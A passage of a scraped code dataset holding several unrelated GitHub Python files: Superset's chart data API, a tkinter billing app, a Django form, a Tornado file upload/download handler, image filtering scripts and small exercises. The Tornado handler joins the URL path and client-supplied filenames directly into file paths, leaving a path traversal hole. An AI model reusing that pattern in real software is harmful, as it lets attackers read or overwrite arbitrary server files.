'#/components/responses/500'\n \"\"\"\n try:\n cached_data = self._load_query_context_form_from_cache(cache_key)\n # Set form_data in Flask Global as it is used as a fallback\n # for async queries with jinja context\n setattr(g, \"form_data\", cached_data)\n query_context = self._create_query_context_from_form(cached_data)\n command = ChartDataCommand(query_context)\n command.validate()\n except ChartDataCacheLoadError:\n return self.response_404()\n except ValidationError as error:\n return self.response_400(\n message=_(\"Request is incorrect: %(error)s\", error=error.messages)\n )\n\n return self._get_data_response(command, True)\n\n def _run_async(\n self, form_data: dict[str, Any], command: ChartDataCommand\n ) -> Response:\n \"\"\"\n Execute command as an async query.\n \"\"\"\n # First, look for the chart query results in the cache.\n with contextlib.suppress(ChartDataCacheLoadError):\n result = command.run(force_cached=True)\n if result is not None:\n return self._send_chart_response(result)\n # Otherwise, kick off a background job to run the chart query.\n # Clients will either poll or be notified of query completion,\n # at which point they will call the /data/ endpoint\n # to retrieve the results.\n async_command = CreateAsyncChartDataJobCommand()\n try:\n async_command.validate(request)\n except AsyncQueryTokenException:\n return self.response_401()\n\n result = async_command.run(form_data, get_user_id())\n return self.response(202, **result)\n\n def _send_chart_response(\n self,\n result: dict[Any, Any],\n form_data: dict[str, Any] | None = None,\n datasource: BaseDatasource | Query | None = None,\n ) -> Response:\n result_type = result[\"query_context\"].result_type\n result_format = result[\"query_context\"].result_format\n\n # Post-process the data so it matches the data presented in the chart.\n # This is needed for sending reports based on text charts that do the\n # post-processing of data, eg, the pivot table.\n if result_type == ChartDataResultType.POST_PROCESSED:\n result = apply_post_process(result, form_data, datasource)\n\n if result_format in ChartDataResultFormat.table_like():\n # Verify user has permission to export file\n if not security_manager.can_access(\"can_csv\", \"Superset\"):\n return self.response_403()\n\n if not result[\"queries\"]:\n return self.response_400(_(\"Empty query result\"))\n\n is_csv_format = result_format == ChartDataResultFormat.CSV\n\n if len(result[\"queries\"]) == 1:\n # return single query results\n data = result[\"queries\"][0][\"data\"]\n if is_csv_format:\n return CsvResponse(data, headers=generate_download_headers(\"csv\"))\n\n return XlsxResponse(data, headers=generate_download_headers(\"xlsx\"))\n\n # return multi-query results bundled as a zip file\n def _process_data(query_data: Any) -> Any:\n if result_format == ChartDataResultFormat.CSV:\n encoding = current_app.config[\"CSV_EXPORT\"].get(\"encoding\", \"utf-8\")\n return query_data.encode(encoding)\n return query_data\n\n files = {\n f\"query_{idx + 1}.{result_format}\": _process_data(query[\"data\"])\n for idx, query in enumerate(result[\"queries\"])\n }\n return Response(\n create_zip(files),\n headers=generate_download_headers(\"zip\"),\n mimetype=\"application/zip\",\n )\n\n if result_format == ChartDataResultFormat.JSON:\n response_data = simplejson.dumps(\n {\"result\": result[\"queries\"]},\n default=json_int_dttm_ser,\n ignore_nan=True,\n )\n resp = make_response(response_data, 200)\n resp.headers[\"Content-Type\"] = \"application/json; charset=utf-8\"\n return resp\n\n return self.response_400(message=f\"Unsupported result_format: {result_format}\")\n\n def _get_data_response(\n self,\n command: ChartDataCommand,\n force_cached: bool = False,\n form_data: dict[str, Any] | None = None,\n datasource: BaseDatasource | Query | None = None,\n ) -> Response:\n try:\n result = command.run(force_cached=force_cached)\n except ChartDataCacheLoadError as exc:\n return self.response_422(message=exc.message)\n except ChartDataQueryFailedError as exc:\n return self.response_400(message=exc.message)\n\n return self._send_chart_response(result, form_data, datasource)\n\n # pylint: disable=invalid-name\n def _load_query_context_form_from_cache(self, cache_key: str) -> dict[str, Any]:\n return QueryContextCacheLoader.load(cache_key)\n\n def _create_query_context_from_form(\n self, form_data: dict[str, Any]\n ) -> QueryContext:\n try:\n return ChartDataQueryContextSchema().load(form_data)\n except KeyError as ex:\n raise ValidationError(\"Request is incorrect\") from ex\n except ValidationError as error:\n raise error\n","repo_name":"apache/superset","sub_path":"superset/charts/data/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":15816,"program_lang":"python","lang":"en","doc_type":"code","stars":55269,"dataset":"github-code","pt":"61"}
+{"seq_id":"15586972622","text":"from tkinter import *\nimport datetime\nimport pandas\nfrom tkinter import ttk\n\nimport pandas as pd\n\nstore_items = {\n \"1\": [\"Vada\", 10],\n \"2\": [\"Idly\", 30]\n}\nitems = pd.read_csv('items.csv', index_col=False)\n\n\nid = 0\nddict = {\n \"ID\": [],\n \"item\": [],\n \"price\": [],\n \"quantity\": [],\n \"date\": [],\n \"time\": []\n}\ndate = (datetime.datetime.now().strftime(\"%d-%h-%Y %H-%M-%S\"))\n\ndata = pandas.DataFrame(ddict)\ntotal_price = 0\n\n\ndef add_to_csv():\n global data, label_count, id, total_price\n for each in tree.get_children():\n item = tree.item(each)['values'][0]\n quantity = tree.item(each)['values'][1]\n price = tree.item(each)['values'][2]\n # new = pandas.Series([id, item,price, quantity, date.split()[0], date.split()[1]], index=data.columns)\n # data = data.append(new, ignore_index=True)\n # new = pandas.DataFrame([id,item,quantity])\n data.loc[len(data)] = [id, item, price, quantity, date.split()[0], date.split()[1]]\n # data = pandas.concat([data,new], axis=0, ignore_index=True)\n tree.delete(each)\n id += 1\n total_price = 0\n price_label.config(text=total_price)\n\n\ndef Save():\n save = f\"./item {date}.csv\"\n data.to_csv(save)\n\n\ndef Add():\n global row, col, label_count, quantity, var_name, total_price\n var_name = f\"new_text{label_count}\"\n user_entered_item = (item_entry.get())\n if user_entered_item.isdigit():\n\n item = items.name[(items.id == int(user_entered_item)) ].values[0]\n price = items.price[(items.id == int(user_entered_item))].values[0]\n else:\n item = items.name[(items.name == user_entered_item) ].values[0]\n price = items.price[(items.name == (user_entered_item)) ].values[0]\n # ][1]\n\n quantity = int(quantity_entry.get())\n total_price += price * quantity\n # list_box.insert(END, f\"{item} {quantity}\")\n tree.insert('', END, text=\"1\", values=(item, quantity, price * quantity))\n # f\"new_text{label_count}\" = canvas.create_text(70, col, text=f\"{item} {quantity}\", font=\"Arial, 20\")\n # print(var_name)\n # print(canvas.itemcget(var_name, 'text'))\n col += 30\n # var_name = Label(tk, text=f\"{item} {quantity}\", font=(\"Arial\", 15, \"normal\"))\n # var_name.grid(row=row, column=1, columnspan=5)\n\n price_label.config(text=total_price)\n\n\n\n submit_button = Button(text=\"Submit\", command=add_to_csv)\n submit_button.place(x=1170, y=400)\n\n\n\n item_entry.delete(0, END)\n quantity_entry.delete(0, END)\n\n\ndef Delete():\n global total_price\n selected_tree = tree.selection()\n for each in selected_tree:\n price_to_remove =(tree.item(item=each)['values'][2])\n tree.delete(each)\n total_price -= price_to_remove\n price_label.config(text=total_price)\n\n\ntk = Tk()\nwidth = tk.winfo_screenwidth()\nheight = tk.winfo_screenheight()\ntk.geometry(\"%dx%d\" % (width, height))\ntk.title(\"Data Science Billing\")\n# frame = Frame(tk, width=800, height=500)\n# frame.pack_forget()\n# canvas = Canvas(width=1000, height=400, bg=\"white\")\n# canvas.create_window((0,0), window=my_frame)\nmy_frame = Frame(tk, bg=\"yellow\", width=50)\nmy_frame.grid(padx=220, pady=50, column=1, row=0)\n\n# txt = canvas.create_text(0,149,text=\"gslha\", font=\"Arial, 20\")\n# bbox = canvas.bbox(txt)\n# canvas.create_rectangle(bbo)\n#\n# hbar = Scrollbar(canvas,orient=VERTICAL)\n# hbar.place(x=900,y=400)\n# hbar.config(command=canvas.yview)\n\n# text = canvas.create_text(50, 20, text=\"Hello\", font=\"Arial, 20\")\n# canvas.grid(padx=20, pady=20,row=0, column=0)\n# canvas.place(x=50, y=10)\n\nitem_Label = Label(tk, text=\"Item\", font=(\"Arial\", 20, \"normal\"))\nitem_Label.place(x=520, y=525)\n# item_Label.grid(row=1, column=0)\n\nquantity_Label = Label(tk, text=\"Quantity\", font=(\"Arial\", 20, \"normal\"))\n# quantity_Label.grid(row=1, column=2)\nquantity_Label.place(y=525, x=850)\n# price_Label = Label(text=\"Price\", font=(\"Arial\", 20, \"normal\"))\n# price_Label.grid(row=0, column=3)\n\nitem_entry = Entry(tk, width=50)\n# item_entry.grid(row=2, column=1, sticky=\"E\", padx=12, ipady=5)\nitem_entry.place(x=350, y=575, height=30)\n\nquantity_entry = Entry(tk, width=20)\n# quantity_entry.grid(row=2, column=2, padx=12, ipady=5)\nquantity_entry.place(x=820, y=575, height=30)\n\ntotal_price_label = Label(tk, text=\"Total Price:\", font=(\"Arial\", 20, \"normal\"))\ntotal_price_label.place(x=820,y=450, height=20)\n# price_entry = Entry(width=20, justify=\"right\")\n# price_entry.grid(row=1, column=3, padx=12, ipady=5)\n\n\nadd_button = Button(tk, text=\"Add\", command=Add)\n# add_button.grid(row=1, column=4, columnspan=4, padx=20, ipady=2, pady=20, ipadx=50)\nadd_button.place(x=620, y=625, height=30)\n\ndelete_button = Button(tk, text=\"Delete\", command=Delete)\ndelete_button.place(x=760, y=625, height=30)\n\ntree = ttk.Treeview(my_frame, columns=(\"c1\", \"c2\", \"c3\"), show=\"headings\", height=18)\ntree.column('# 1', anchor=CENTER, width=500)\ntree.heading(\"# 1\", text=\"Item\")\ntree.column('# 2', anchor=CENTER, width=200)\ntree.heading(\"# 2\", text=\"Quantity\")\ntree.column('# 3', anchor=CENTER, width=200)\ntree.heading(\"# 3\", text=\"Price\")\n\ntree.grid(sticky=\"nwes\")\n\n# tree.insert('', END, text=\"1\", values=(\"1\",\"1\",\"1\"))\n# tree.insert('', END, text=\"1\", values=(\"1\",\"1\",\"1\"))\n# tree.insert('', END, text=\"1\", values=(\"1\",\"1\",\"1\"))\n# tree.insert('', END, text=\"1\", values=(\"1\",\"1\",\"1\"))\n# tree.insert('', END, text=\"1\", values=(\"1\",\"1\",\"1\"))\n# tree.insert('', END, text=\"1\", values=(\"1\",\"1\",\"1\"))\n# tree.insert('', END, text=\"1\", values=(\"1\",\"1\",\"1\"))\n# tree.insert('', END, text=\"1\", values=(\"1\",\"1\",\"1\"))\n# tree.insert('', END, text=\"1\", values=(\"1\",\"2\",\"1\"))\nprice_label = Label(tk, text=total_price, font=(\"Arial\", 20, \"normal\"))\nprice_label.place(x=970, y=450, height=20)\n\nmyscrollbar = Scrollbar(my_frame, orient=VERTICAL, command=tree.yview)\nmyscrollbar.grid(row=0, column=1, sticky=\"news\")\ntree.config(yscrollcommand=myscrollbar.set)\n# print(tree.item(tree.get_children()[0])['values'][0])\n# for each in tree.item(tree.get_children()[0]).values():\n# print(type(each))\n# myscrollbar.\n# print(tree.get_children())\n# my_frame.conf\n\n\n# my_frame.pack()\n\nrow = 4\ncol = 20\nlabel_count = 0\n\nsave = Button(text=\"Save\", command=Save)\n# save.grid(row=row + 1, column=1, columnspan=5, pady=20, ipadx=20, ipady=5)\nsave.place(x=1270, y=400)\n# print(quantity_entry.get())\n# item = (item_entry.get())\ntk.columnconfigure(1, minsize=3)\n\ntk.mainloop()\n","repo_name":"PoorneshShiva/Data_Science_Billing","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"33997241033","text":"# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n # @param head, a ListNode\n # @return a ListNode\n def insertionSortList(self, head):\n if not head: return head\n fh = ListNode(0)\n fh.next = head\n cur = head\n while cur.next:\n if cur.next.val < cur.val:\n pre = fh\n while pre.next.val < cur.next.val:\n pre = pre.next\n t = cur.next\n cur.next = t.next\n t.next = pre.next\n pre.next = t\n else:\n cur = cur.next\n return fh.next\n\nif __name__ == '__main__':\n head=ListNode(-1)\n head.next=ListNode(3)\n head.next.next=ListNode(5)\n head.next.next.next=ListNode(2)\n head=Solution().insertionSortList(head)\n while head:\n print(head.val)\n head=head.next\n pass\n","repo_name":"javayhu/XSolutions","sub_path":"python/InsertionSortList.py","file_name":"InsertionSortList.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"12538511164","text":"from django import forms\nfrom .models import Todo\nfrom .validators import *\nimport re\n\nclass TodoForm(forms.ModelForm):\n title = forms.CharField(\n label='제목',\n widget=forms.TextInput(\n attrs={\n 'placeholder': '제목 입력',\n 'class': 'form-control'}\n ),\n validators=[first_validator],\n required=True\n )\n \n\n content = forms.CharField(\n label='내용',\n widget=forms.Textarea(\n attrs={\n 'placeholder': '내용 입력',\n 'class': 'my-content form-control'}\n ),\n required=True\n )\n def clean_content(self):\n content = self.cleaned_data.get('content')\n if content:\n content = re.sub(r'[a-zA-z]+', '', content) #영어제거.. 애초에 경고하는 법은 어떻게 할까?\n return content\n\n \n priority = forms.IntegerField(\n label='우선 순위',\n widget=forms.NumberInput(\n attrs={\n 'min': 1, 'max': 5, 'value': 3,\n 'class': 'form-control'}\n ),\n required=True\n )\n\n deadline = forms.DateField(\n label='마감 기한',\n widget=forms.DateInput(\n attrs={\n 'class': 'form-control',\n 'type': 'date'}\n ),\n required=True\n )\n class Meta:\n model = Todo\n exclude = ('completed',)","repo_name":"illson97/TIL_errday","sub_path":"TIL_django/TIL_django10_exercise/todos/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"73446195073","text":"#coding: utf8\n\nimport tornado.ioloop\nimport tornado.web\nimport os\nfrom utils import *\n\nclass UploadFileHandler(tornado.web.RequestHandler):\n\n\tdef get(self,file = \"\"):\n\n\t\tif file == \"\":\n\t\t\tself.redirect(\"/\")\n\n\t\tprefix = file.split('.')[1]\n\n\t\ttype = \"application/octet-stream\"\n\n\t\tif prefix == \"jpg\":\n\t\t\ttype = \"image/jpeg\"\n\n\t\telif prefix == \"png\":\n\t\t\ttype = \"image/png\"\n\n\t\telif prefix == \"bmp\":\n\t\t\ttype = \"application/x-bmp\"\n\n\t\telif prefix == \"gif\":\n\t\t\ttype = \"image/gif\"\n\n\t\telif prefix == \"mp3\":\n\t\t\ttype = \"audio/mp3\"\n\n\t\telif prefix == \"mp4\":\n\t\t\ttype = \"video/mpeg4\"\n\n\t\telif prefix == \"html\" or prefix == \"txt\" or prefix == \"htm\":\n\t\t\ttype = \"text/html\"\n\n\n\t\tself.set_header ('Content-Type', type)\n\n\t\t#self.set_header ('Content-Disposition', 'attachment; filename='+file)\n\n\t\t#读取的模式需要根据实际情况进行修改\n\t\twith open(cur_dir() + C('upload')+file, 'rb') as f:\n\t\t\twhile True:\n\t\t\t\tdata = f.read(1000)\n\t\t\t\tif not data:\n\t\t\t\t\tbreak\n\t\t\t\tself.write(data)\n\n\t\t#记得有finish哦\n\t\tself.finish()\n\n\tdef post(self,file = \"\"):\n\n\t\tupload_path = cur_dir() + C('upload') \n\n\t\t#提取表单中‘name’为‘file’的文件元数据\n\t\tfile_metas=self.request.files['file']\t\n\t\tfor meta in file_metas:\n\n\t\t\tfilename=meta['filename']\n\t\t\tfilepath=os.path.join(upload_path,filename)\n\n\t\t\t#有些文件需要已二进制的形式存储,实际中可以更改\n\t\t\twith open(filepath,'wb') as up:\t \n\t\t\t\tup.write(meta['body'])\n\n\t\t\tself.write('finished!')","repo_name":"alexmerser/mylog","sub_path":"upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"9501875208","text":"#!/usr/bin/env python3\n\n#author: Haim\n\nimport os.path\nimport re\nimport sys\n\n\ndef Usage():\n print(\"Usage: grep.py phrase path\")\n\n \nif len(sys.argv) != 3:\n Usage()\n exit(1)\n\nphrase = sys.argv[1]\npath = sys.argv[2]\n\nif phrase == \"\" or path == \"\":\n print(\"At least one of the parameters is empty!\")\n Usage()\n exit(2)\n\nif not os.path.isfile(path):\n print(\"File doesn't exist!\")\n Usage()\n exit(3)\n\nwith open(path,\"r\") as file:\n for line in file:\n if re.search(phrase, line):\n print(line)","repo_name":"haimxx/DevOps","sub_path":"ex5/q1/b/grep2.py","file_name":"grep2.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"70496187395","text":"from PIL import Image\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport cv2\n\n#fig, axes = plt.subplots(2, 2, figsize=(7,5))\ndef pool(image, fn, kernel=5, stride=2):\n h_prev, w_prev, n = image.shape\n\n h = int((h_prev - kernel) / stride) + 1\n w = int((w_prev - kernel) / stride) + 1\n\n downsampled = np.zeros((h, w, n))\n\n for i in range(n):\n curr_y = out_y = 0\n # slide the max pooling window vertically across the image\n while curr_y + kernel <= h_prev:\n curr_x = out_x = 0\n # slide the max pooling window horizontally across the image\n while curr_x + kernel <= w_prev:\n # choose the maximum value within the window at each step and store it to the output matrix\n\n downsampled[out_y, out_x, i] = fn(image[curr_y:curr_y + kernel,\n curr_x:curr_x + kernel, i])\n\n curr_x += stride\n out_x += 1\n curr_y += stride\n out_y += 1\n\n return downsampled\n\n\ndef scan(image, filt, stride=1):\n kernel = filt.shape[0]\n h_prev, w_prev, n = image.shape\n\n h = int((h_prev - kernel) / stride) + 1\n w = int((w_prev - kernel) / stride) + 1\n downsampled = np.zeros((h, w, n))\n\n for i in range(n):\n curr_y = out_y = 0\n # slide the max pooling window vertically across the image\n while curr_y + kernel <= h_prev:\n curr_x = out_x = 0\n # slide the max pooling window horizontally across the image\n while curr_x + kernel <= w_prev:\n # choose the maximum value within the window at each step and store it to the output matrix\n\n downsampled[out_y, out_x, i] = np.sum(filt *\n image[curr_y:curr_y + kernel,\n curr_x:curr_x + kernel, i])\n\n curr_x += stride\n out_x += 1\n curr_y += stride\n out_y += 1\n\n return downsampled\n\nimg = cv2.imread('images/unmarked/masks/Female Archback 4.jpg')\nblur = cv2.bilateralFilter(img,40,100,100)\n\n\n# print(blur2.shape)\n# cv2.imshow('blur', blur2)\n# cv2.imshow('original', img)\n# cv2.waitKey(0)\n# cv2.destroyAllWindows()\n#plt.imsave('images/unmarked/filter/Female Archback 4.jpg', blur)\ndef detectEdges(arg, size=5):\n img = pool(arg[:, :, :2], np.mean, kernel=50)\n hor = np.zeros((size, size))\n hor[size // 2 - 1, :] = -10\n hor[size // 2, :] = 10\n\n vert = np.zeros((size, size))\n vert[:, size // 2 - 1] = -10\n vert[:, size // 2] = 10\n\n img1 = scan(img[:, :, :2], hor)\n img2 = scan(img[:, :, :2], vert)\n\n img1 = np.abs(img1)\n img2 = np.abs(img2)\n\n img = img2 + img1\n return np.sum(img, axis=2)\n\ndef auto_canny(image, sigma=0.33):\n # compute the median of the single channel pixel intensities\n v = np.median(image)\n\n # apply automatic Canny edge detection using the computed median\n lower = int(max(0, (1.0 - sigma) * v))\n upper = int(min(255, (1.0 + sigma) * v))\n edged = cv2.Canny(image, lower, upper)\n\n # return the edged image\n return edged\n# blur2 = auto_canny(blur)\n# blur2 = auto_canny(blur)\n#axes[1,1] = sns.heatmap(detectEdges(blur), cbar=None)\n#axes[1,0].imshow(blur)\n#axes[2,0].imshow(blur)\n#axes[0,0].imshow(img)\n#sns.heatmap(detectEdges(img), ax=axes[0,1],cbar=None)\n#sns.heatmap(detectEdges(blur), ax=axes[1,1],cbar=None)\nplt.imshow(detectEdges(img))\n\n#sns.heatmap(auto_canny(blur), ax=axes[2,1],cbar=None)\nplt.tight_layout()\n\n#axes[0].axis(\"off\")\nplt.show()\n\n# plt.show()","repo_name":"ferozemohideen/ml-footprint-detection","sub_path":"test_image_blur.py","file_name":"test_image_blur.py","file_ext":"py","file_size_in_byte":3639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"14040876296","text":"\"\"\"\nSelect categories and output the latex table.\n\"\"\"\nimport torch, sys, os, argparse\nsys.path.insert(0, \".\")\nimport numpy as np\nfrom collections import OrderedDict\n\nfrom lib.misc import *\nfrom lib.op import torch2numpy\nfrom evaluate import read_results\n\n\ndef get_table_suit(G_name, ds):\n ds_name = \"Bedroom\" if ds == \"bedroom\" else \"Church\"\n FGs = [formal_name(G_name) + \"-\" + ds_name]\n methods = [\"LSE\", \"NSE-1\", \"NSE-2\"]\n loss_types = [\"N\"]\n lrs = [\"0.001\"]\n lw_types = [\"SP\"]\n ls = [\"Trunc\"]#[\"Tmixed\", \"Ttrunc\"]\n els = [\"Etrunc\"]#[\"Emixed\", \"Etrunc\"]\n row_groups = [FGs, methods, loss_types, ls]\n col_groups = [lw_types, lrs, els]\n row_names = enumerate_names(groups=row_groups)\n col_names = enumerate_names(groups=col_groups)\n\n Gs = [G_name + \"_\" + ds]\n loss_types = [\"lnormal\"]\n lrs = [\"lr0.001\"]\n lw_types = [\"lwsoftplus\"]#, \"lwnone\"]\n ls = [\"lstrunc-wp\"] #[\"lsnotrunc-mixwp\", \"lstrunc-wp\"]\n els = [\"elstrunc-wp\"] #[\"elsnotrunc-mixwp\", \"elstrunc-wp\"]\n row_groups = [Gs, methods, loss_types, ls]\n col_groups = [lw_types, lrs, els]\n row_args = enumerate_args(groups=row_groups)\n col_args = enumerate_args(groups=col_groups)\n for row_name, row_arg in zip(row_names, row_args):\n for col_name, col_arg in zip(col_names, col_args):\n row = \"-\".join(row_name)\n col = \"-\".join(col_name)\n arg = \"_\".join(row_arg + col_arg)\n yield row, col, arg #row_arg, col_arg\n\n\ndef get_class_table(data_dir, G_name, ds):\n dic = OrderedDict()\n for row_name, col_name, arg in get_table_suit(G_name, ds):\n if row_name not in dic:\n dic[row_name] = OrderedDict()\n fpath = f\"{data_dir}/{arg}.txt\"\n if not os.path.exists(fpath):\n print(f\"=> {fpath} not found\")\n dic[row_name][col_name] = -1\n else:\n mIoU, cIoUs = read_results(fpath)\n clabels = []\n cious = []\n for i in range(len(cIoUs)):\n if float(cIoUs[i]) > 0.1:\n cious.append(float(cIoUs[i]))\n clabels.append(labels[i])\n dic[row_name][col_name] = cIoUs\n return dic\n\n\ndef get_common_labels(dic):\n common_labels = set()\n for k1 in dic.keys():\n for k2 in dic[k1].keys():\n cious = dic[k1][k2]\n for i in range(len(cious)):\n if cious[i] > 0.1:\n common_labels.add(labels[i])\n common_labels = list(common_labels)\n common_label_indice = [labels.index(n) for n in common_labels]\n common_label_indice.sort()\n return common_label_indice\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--dir\", default=\"results/full_label_SE/\", help=\"\")\n args = parser.parse_args()\n labels = read_ade20k_labels()[1:]\n G_labels = OrderedDict()\n gdic = OrderedDict()\n # read classwise data\n for G_name in [\"pggan\", \"stylegan\", \"stylegan2\"]:\n G_labels[G_name] = OrderedDict()\n gdic[G_name] = OrderedDict()\n for ds in [\"bedroom\", \"church\"]:\n gdic[G_name][ds] = OrderedDict()\n dic = get_class_table(args.dir, G_name, ds)\n label_indice = get_common_labels(dic)\n selected_labels = np.array(labels)[label_indice]\n G_labels[G_name][ds] = selected_labels\n ndic = OrderedDict()\n for k1 in dic.keys():\n for k2 in dic[k1].keys():\n ndic[f\"{k1}_{k2}\"] = OrderedDict()\n cious = np.array(dic[k1][k2])[label_indice]\n for n, v in zip(selected_labels, cious):\n ndic[f\"{k1}_{k2}\"][n] = v\n gdic[G_name][ds][k1] = cious.mean()\n\n strs = str_table_single(ndic)\n with open(f\"results/tex/catselect_class_{G_name}_{ds}.tex\", \"w\") as f:\n f.write(str_latex_table(strs))\n\n strs = str_table_multiple(gdic)\n with open(f\"results/tex/catselect_global.tex\", \"w\") as f:\n f.write(str_latex_table(strs))\n\n with open(\"figure/selected_labels.csv\", \"w\") as f:\n for G in [\"stylegan2\", \"stylegan\", \"pggan\"]:\n for ds in [\"bedroom\", \"church\"]:\n s = \",\".join([G + \"_\" + ds] + list(G_labels[G][ds]))\n f.write(s + \"\\n\")","repo_name":"AtlantixJJ/LinearGAN","sub_path":"figure/category_selection.py","file_name":"category_selection.py","file_ext":"py","file_size_in_byte":3921,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"}
+{"seq_id":"3095968257","text":"# 48\r\ncount = 0\r\nwhile True:\r\n\tdigit, sum = map(int, input().split())\r\n\tif digit == 0 and sum == 0:\r\n\t\tbreak\r\n\tfor i in range(10):\r\n\t\tif digit + i == sum:\r\n\t\t\tcount += 1\r\n\r\nprint(count)\r\n\r\n# 49\r\nfrom math import sqrt\r\nhorizontal, vertical, diagonal = map(int, input(\"sides:\").split(\",\"))\r\nif sqrt(horizontal ** 2 + vertical ** 2) == diagonal:\r\n\tprint(\"rectangle\")\r\nelse:\r\n\tprint(\"not rectangle\")\r\n\r\n# 50\r\nwords = input(\"string:\").split(\"Python\")\r\nprint(\"Java\".join(map(lambda segment: segment.replace(\"Java\", \"Python\"),\r\n words)))\r\n\r\n# 51\r\nnumber = input(\"number:\")\r\nprint(\r\n int(\"\".join(sorted(number, reverse=True))) - int(\"\".join(sorted(number))))\r\n\r\n# 52\r\nfrom math import floor\r\n\r\ndef isPrime(number):\r\n\tif number < 2:\r\n\t\treturn False\r\n\tfor i in range(2, floor(number / 2) + 1):\r\n\t\tif number % i == 0:\r\n\t\t\treturn False\r\n\treturn True\r\n\r\ncount = 0\r\nnumber = int(input(\"number:\"))\r\ni = 1\r\nsum = 0\r\nwhile count < number:\r\n\tif isPrime(i):\r\n\t\tsum += i\r\n\t\tcount += 1\r\n\ti += 1\r\n\r\nprint(sum)\r\n\r\n# 53\r\nfrom math import floor\r\n\r\ndef isPrime(number):\r\n\tif number < 2:\r\n\t\treturn False\r\n\tfor i in range(2, floor(number / 2) + 1):\r\n\t\tif number % i == 0:\r\n\t\t\treturn False\r\n\treturn True\r\n\r\nnumber = int(input(\"number:\"))\r\n\r\ncount = 0\r\nfor i in range(floor(number / 2)):\r\n\tif not (isPrime(i) and isPrime(number - i)):\r\n\t\tcontinue\r\n\tcount += 1\r\n\r\nprint(count)\r\n\r\n# 54\r\nnumber = int(input(\"number:\"))\r\nprint((number * number + number + 2) // 2)","repo_name":"RedGuy12/python","sub_path":"4/48-54.py","file_name":"48-54.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"26256209269","text":"import cv2\r\nimport numpy as np\r\n\r\n# 定义6*6数据全为1的模板,用其乘以6*6矩阵中所有的图像数据,再除以36得到一个均值,把均值替换掉中心元素\r\n\r\nimg = cv2.imread('image11.jpg', 1)\r\ncv2.imshow('src', img)\r\n\r\nimgInformation = img.shape\r\nheight = imgInformation[0]\r\nwidth = imgInformation[1]\r\ndst = np.zeros((height, width, 3), np.uint8)\r\n\r\nfor i in range(3, height-3):\r\n for j in range(3, width-3):\r\n sum_b = int(0) # 统计模板中的均值\r\n sum_g = int(0)\r\n sum_r = int(0)\r\n for m in range(-3, 3):\r\n for n in range(-3, 3):\r\n (b, g, r) = img[i+m, j+n] # 读取图像中的每一个像素\r\n sum_b = sum_b + int(b) # b本来是uint8类型,转换成int类型是防止相加的时候出现越界\r\n sum_g = sum_g + int(g)\r\n sum_r = sum_r + int(r)\r\n b = np.uint8(sum_b / 36) # 求b的均值\r\n g = np.uint8(sum_g / 36)\r\n r = np.uint8(sum_r / 36)\r\n dst[i, j] = (b, g, r) # 把新的b,g,r填充到目标图像中\r\n\t\t\r\ncv2.imshow('dst', dst)\r\ncv2.waitKey(0)","repo_name":"QHXCoder2017/Code-practice-in-Image-Processing","sub_path":"image enhancement/均值滤波.py","file_name":"均值滤波.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"16601215478","text":"# force floating point division. Can still use integer with //\nfrom __future__ import division\n# other good compatibility recquirements for python3\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n# This file is used for importing the common utilities classes.\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sys,copy,scipy\nsys.path.append(\"../../../../../../../\")\nfrom Research.Perkins.AnalysisUtil.Images import ImageUtil\nfrom Research.Perkins.AnalysisUtil.ForceExtensionAnalysis import FEC_Util\nfrom GeneralUtil.python import GenUtilities,PlotUtilities,CheckpointUtilities\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nfrom skimage.filters import gaussian\nfrom skimage.morphology import skeletonize\nfrom skimage import measure,img_as_uint\nfrom skimage.segmentation import active_contour\nimport networkx as nx\nfrom scipy.interpolate import splprep, splev, interp1d,UnivariateSpline\n\nfrom sklearn.neighbors import NearestNeighbors\nfrom route.postman import single_chinese_postman_path\n\nfrom ImageUtil import subtract_background\n\nclass transform:\n def __init__(self,name,function,imshow_kw=dict(cmap=plt.cm.afmhot)):\n self.name = name\n self.function = function\n self.imshow_kw = imshow_kw\n\n\ndef realistic_min_max(image,q_low=90,q_high=99.9):\n data = image.height_nm()\n low,high = np.percentile(data.flatten(),[q_low,q_high])\n return low,high\n \ndef plot_with_background_corrected(args,imshow_kw_list=None):\n n = len(args)\n fig = PlotUtilities.figure((3.5,2*n))\n for i,a in enumerate(args):\n ax = plt.subplot(n,1,(i+1))\n m_list = imshow_kw_list[i]\n if (m_list['cmap'] == plt.cm.afmhot):\n vmin,vmax = realistic_min_max(a)\n else:\n vmin,vmax = 0,None\n imshow_kwargs = dict(vmin=vmin,vmax=vmax,**m_list)\n im = ImageUtil.make_image_plot(a,pct=50,imshow_kwargs=imshow_kwargs)\n if (i == 0):\n ImageUtil.smart_colorbar(im=im,ax=ax,fig=fig)\n if (i < n-1):\n PlotUtilities.xlabel(\"\",ax=ax)\n PlotUtilities.no_x_label(ax=ax)\n ImageUtil.smart_colorbar(im=im,ax=ax,fig=fig,add_space_only=True)\n else:\n 